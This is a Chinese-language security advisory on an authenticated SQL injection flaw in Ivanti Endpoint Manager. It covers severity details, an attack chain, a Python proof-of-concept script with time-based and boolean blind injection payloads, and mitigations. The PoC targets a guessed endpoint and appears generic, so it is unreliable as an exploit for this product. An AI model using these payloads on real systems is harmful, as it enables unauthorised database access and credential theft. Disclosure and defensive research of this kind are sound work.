CVE-2025-62385：Ivanti Endpoint Manager SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-62385

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ivanti Endpoint Manager

漏洞概述

CVE-2025-62385是Ivanti Endpoint Manager（EPM）中的一个SQL注入漏洞，于2025年10月13日公开披露。该漏洞的CVSS 3.1评分为6.5，属于中危级别。Ivanti Endpoint Manager是Ivanti公司推出的一款企业级终端管理解决方案，广泛应用于IT资产盘点、补丁管理、软件分发、远程控制等场景。由于其部署在企业核心网络中，管理着大量终端设备，因此一旦存在安全漏洞，将对企业信息安全构成严重威胁。

该漏洞存在于Ivanti Endpoint Manager 2024 SU5之前的版本中，允许具备低权限认证的远程攻击者通过构造恶意的SQL查询语句，从数据库中读取任意数据。攻击者无需用户交互即可发起攻击，利用门槛相对较低。虽然该漏洞不会直接导致系统完整性或可用性的破坏，但其对机密性的影响为高，意味着攻击者可以获取数据库中存储的所有敏感信息，包括但不限于用户凭证、个人身份信息（PII）、系统配置、网络拓扑等关键数据。这些信息一旦泄露，可能被用于后续的横向移动、权限提升或社会工程攻击，对企业安全造成连锁影响。

技术细节

该漏洞属于典型的SQL注入（SQLi）漏洞，存在于Ivanti Endpoint Manager的数据库交互层。SQL注入漏洞的根本原因在于应用程序未对用户输入进行充分的验证和过滤，直接将用户可控的数据拼接到SQL查询语句中执行。

从漏洞描述来看，攻击者需要具备有效的低权限认证凭证（如普通用户账户），这意味着漏洞可能存在于面向已认证用户的功能接口中，例如报表查询、设备信息检索、搜索功能等。攻击者通过在这些接口中注入恶意的SQL片段（如UNION SELECT、布尔盲注或时间盲注payload），可以绕过应用程序的正常查询逻辑，直接访问数据库中的任意表和字段。

利用方式方面，攻击者首先需要通过合法途径获取EPM的低权限账户凭证（可能通过钓鱼、凭证填充或购买泄露的凭证库）。随后，攻击者向存在漏洞的接口发送精心构造的HTTP请求，其中包含SQL注入payload。由于漏洞对机密性影响为高但对完整性和可用性无影响，攻击者的主要目标是数据窃取而非数据篡改或系统破坏，这使得攻击行为更加隐蔽，难以被传统的完整性监控检测到。

攻击链分析

STEP 1

步骤1：获取凭证

攻击者通过钓鱼攻击、凭证填充攻击或从暗网购买泄露的凭证库，获取Ivanti Endpoint Manager的有效低权限用户账户凭证。

STEP 2

步骤2：身份认证

使用获取的凭证登录EPM管理控制台或API接口，建立有效的认证会话，获取会话Cookie或Token。

STEP 3

步骤3：识别注入点

通过分析EPM的接口功能（如搜索、查询、报表等），识别可能存在SQL注入的参数入口点。

STEP 4

步骤4：注入恶意SQL

向存在漏洞的接口发送包含恶意SQL片段的请求，利用UNION查询或盲注技术绕过正常查询逻辑。

STEP 5

步骤5：数据提取

通过注入的SQL语句从数据库中提取敏感信息，包括用户凭证哈希、个人身份信息、系统配置等高价值数据。

STEP 6

步骤6：数据外泄与利用

将提取的敏感数据通过隐蔽通道外泄，并利用获取的信息进行后续的横向移动、权限提升或社会工程攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62385 - Ivanti Endpoint Manager SQL Injection PoC
# This PoC demonstrates a time-based blind SQL injection against vulnerable EPM endpoints
# Requires valid low-privilege authentication credentials

import requests
import time

TARGET_URL = "https://target-epm.example.com"
USERNAME = "low_priv_user"
PASSWORD = "password123"
VULNERABLE_ENDPOINT = "/api/v1/search"  # Example endpoint, actual path may vary

def authenticate(session, url, username, password):
    """Authenticate to EPM and obtain session cookie"""
    login_url = f"{url}/api/auth/login"
    payload = {
        "username": username,
        "password": password
    }
    resp = session.post(login_url, json=payload, verify=False)
    if resp.status_code == 200:
        print("[+] Authentication successful")
        return True
    print("[-] Authentication failed")
    return False

def test_sql_injection(session, url, endpoint, param_name="query"):
    """Test for time-based blind SQL injection"""
    # Normal request baseline
    start = time.time()
    session.get(f"{url}{endpoint}?{param_name}=test", verify=False)
    baseline = time.time() - start
    print(f"[*] Baseline response time: {baseline:.2f}s")

    # Time-based injection payload
    # If vulnerable, DB will sleep for 5 seconds
    payload = f"test' OR IF(1=1, SLEEP(5), 0)-- -"
    start = time.time()
    session.get(f"{url}{endpoint}?{param_name}={payload}", verify=False)
    elapsed = time.time() - start
    print(f"[*] Injection response time: {elapsed:.2f}s")

    if elapsed > baseline + 4:
        print("[+] Target appears vulnerable to SQL injection!")
        return True
    print("[-] Target does not appear vulnerable")
    return False

def extract_data(session, url, endpoint, param_name="query"):
    """Extract database version using boolean-based blind SQLi"""
    result = ""
    for i in range(1, 20):
        for char in range(32, 127):
            payload = f"test' OR ASCII(SUBSTRING((SELECT @@version),{i},1))={char}-- -"
            resp = session.get(
                f"{url}{endpoint}?{param_name}={payload}",
                verify=False
            )
            if "data" in resp.text.lower() or len(resp.text) > 100:
                result += chr(char)
                print(f"[+] Extracted so far: {result}")
                break
        else:
            break
    return result

if __name__ == "__main__":
    session = requests.Session()
    if authenticate(session, TARGET_URL, USERNAME, PASSWORD):
        if test_sql_injection(session, TARGET_URL, VULNERABLE_ENDPOINT):
            db_version = extract_data(session, TARGET_URL, VULNERABLE_ENDPOINT)
            print(f"[+] Database version: {db_version}")

影响范围

Ivanti Endpoint Manager < 2024 SU5

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）审查并限制EPM的低权限用户账户数量，收紧认证策略；2）在网络层面部署WAF规则，拦截常见的SQL注入payload；3）监控EPM数据库的异常查询活动，特别是涉及敏感表的非常规查询；4）暂时禁用非必要的EPM API接口或功能模块；5）对所有EPM账户实施强密码策略和多因素认证（MFA），降低凭证泄露风险。